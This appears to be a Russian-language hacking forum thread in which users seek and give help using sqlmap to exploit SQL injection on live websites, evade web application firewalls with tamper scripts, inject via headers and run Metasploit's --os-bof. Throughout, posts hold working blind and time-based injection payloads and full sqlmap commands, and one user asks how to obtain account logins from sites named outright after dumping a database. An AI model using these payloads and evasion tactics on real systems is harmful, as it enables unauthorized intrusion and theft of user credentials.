на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать? касается этой уязвимости http://www.securityfocus.com/bid/92687/info крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может
дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все. пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END)) возвращает ноль при запросе к счема.таблес
да похоже на waf, "441 (SQL Injection Detected) почти на все" почти на всё, но получается не на всё, возможно слово from его смущает, попробуй запрос отправить что то типа "select 1 from 1" к information_schema вероятно поэтому же доступа нет
Подскажите пожалуйста как узать команду --os-bof? Я все делаю с телефона. Скачал себе metasploit framework через терминал GNURoot Debian как требовал sqlmap, но при выполнении запроса с командой --os-bof он все-равно требует наличие метасплоита. Как решить эту проблему? Или может надо сплоит закинуть в папку какую то? И еще вопрос можно ли как то получить логины и пароли к ЛК на этом сайте samp-gf.ru? Сдампил БД через эту узвимость http://samp-gf.ru/download.php?id=3' , но ничего толкового не нашел в таблицах. И вот на этом сайте samp-rp.ru можно что нибудь сделать, я вроде ничего похожего на соль не нашел.
привет как вот такое крутить в sqlmap Request GET /authenticate.php HTTP/1.1 Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 X-Requested-With: XMLHttpRequest Host: wwwl.accuweather.com Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */* HTTP/1.1 302 Found Date: Wed, 23 Nov 2016 12:55:50 GMT Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16 X-Powered-By: PHP/5.4.16 Location: error.php?url=&mt= Content-Length: 43 Keep-Alive: timeout=5, max=64 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Spoiler: Список_параметров_для_фаззинга --level=2 // фазит Cookie header --level=3 // фазит User-Agent header, и Referer заголовки --level=5 // фазит Host header Ну а в твоем случае,так как написали Выше Используй астерикс (*) --user-agent="sqlmap*" // тест иньекции в user-agent --referer="target.com*" //тест иньекци в referer --headers="User-Agent:test*\nReferer:bla" // Тоже самое что и --referer="blas" --user-agent="pipiska*" --headers="MegaHeader= BigPipiska*" // Поиск скули в заголовке MegaHeader Или же просто поставь астерикс(*) в нужном месте для иньекции в твоем request.txt -r request.txt
Подскажите почему так происходит и как это можно обойти. Начал раскручивать /page.aspx?id=1 Вот так выглядел запрос: Code: --random-agent --time-sec 20 Ответ "connection timed out", даже если добавить --hpp Затем попробовал добавить tamper: Code: --hpp --tamper=charunicodeencode,percentage,chardoubleencode --random-agent --time-sec 20 В итоге "500 internal server error": Spoiler: Image with --tamper Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner. Spoiler: Image --banner Но вся проблема теперь состоит в том, что не хочет отображать таблицы. Code: -D *** --tables Spoiler: Image --tables Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors: Spoiler: Image --hpp --parse-errors Та же проблема если использовать --common-tables: Spoiler: Image --common-tables Как такое можно обойти?
если оно само заработало, может на сервере ограничение запросов в минуту например? попробуй --delay=2 выставить, ну попытка не пытка
Попробовал, каждый раз с раного IP. Code: --dbms="Microsoft SQL Server 2014" --os="Windows" --random-agent --time-sec 10 --delay=10 --no-cast --parse-errors --tables --hpp В ответ: Code: [15:04:50] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: String or binary data would be truncated' без --hpp: Code: [15:06:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) с --tamper=почти любые: Code: [10:49:14] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases Далее пробовал самостоятельно подставлять -T [user] -C password и т.д.: Code: [12:31:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Invalid object name 'database_Name.dbo.tbl_Users'' Пробовал брутить с помощью --common-tables, на каждый запрос: Code: [12:55:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) [12:55:00] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Incorrect syntax near '-''
sqlmap выводит сообщение: [ERROR] possible integer casting detected (e.g. "$_mode=intval($_REQUEST['_mode'])") at the back-end web application Что полезного несет эта информация и что следует делать дальше,дабы раскрутить инъекцию параметра как следует?
Народ, вот тоже вопрос по ошибке во время раскрутки уязвимости [10:45:46] [INFO] fetching database names [10:45:50] [WARNING] something went wrong with full UNION technique (could be be cause of limitation on retrieved number of entries). Falling back to partial UNI ON technique [10:45:53] [WARNING] the SQL query provided does not return any output [10:45:53] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' может кто подскажет как такое обойти
Подскажите Blind SQL Injection POST /admin/login/ HTTP/1.1 Cache-Control: no-cache Referer: https://site.com/admin/login/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 Accept-Language: en-us,en;q=0.5 Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 Host: site.com Accept-Encoding: gzip, deflate Content-Length: 80 Content-Type: application/x-www-form-urlencoded username=&password=&login=Login уязвимы оба параметра username,password '+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+' перебором вытащила VERSION 5.5.47-MariaDB DB site_com USER site_com Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable sqlmap.py -u https://site.com/admin/login/ --data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T Пробовала уже по всякому ,Sqlmap не может найти Inj Что я делаю не так? могу скинуть сайт, если подскажете
Здравствуйте помогите с этим. Spoiler sqlmap identified the following injection point(s) with a total of 457 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=69 AND 4268=4268 --- web application technology: PHP 5.4.34, Nginx back-end DBMS: MySQL >= 5.0.0 current user is DBA: False sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=69 AND 4268=4268 --- web application technology: PHP 5.4.34, Nginx back-end DBMS: MySQL 5 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=69 AND 4268=4268 --- web application technology: PHP 5.4.34, Nginx back-end DBMS: MySQL 5 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=69 AND 4268=4268 --- web application technology: PHP 5.4.34, Nginx back-end DBMS: MySQL 5 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=69 AND 4268=4268 --- web application technology: PHP 5.4.34, Nginx back-end DBMS: MySQL >= 5.0.0 current database: None sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=69 AND 4268=4268 --- web application technology: PHP 5.4.34, Nginx back-end DBMS: MySQL >= 5.0.0 При попытке извелечь бд. Появляется такая ошибка: sqlmap error unable to retrieve the number of databases что делать? Название БД я знаю. Но sqlmap не может найти.?
--time-sec=10 это таймаут, попробуй --delay=1 это слип в секундах между запросами а вообще уровень вербозности побольше сделай -v 4 и посмотри что сервер отвечает ----------- судя по payload это time-based как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он